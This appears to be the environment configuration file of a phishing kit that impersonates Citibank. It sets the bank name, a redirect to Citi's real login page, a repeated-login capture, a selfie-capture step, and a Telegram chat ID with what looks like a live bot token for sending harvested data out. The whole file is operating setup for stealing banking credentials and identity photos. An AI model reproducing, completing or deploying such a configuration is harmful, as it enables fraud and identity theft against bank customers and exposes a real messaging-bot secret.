BANK_NAME=CITI
NEXT_PUBLIC_DOCS_PAGE=OFF
NEXT_PUBLIC_EXIT_URL=https://www.citi.com/login
NEXT_PUBLIC_DOUBLE_LOGIN=ON
NEXT_PUBLIC_DOUBLE_EMAIL_LOGIN=OFF
NEXT_PUBLIC_TAKE_SELFIE=ON
TELEGRAM_ID=5103936243
BOT_TOKEN=5515271597:AAEAYLAdQHmMp4eznAvfp5HU4eA6LQNHdf8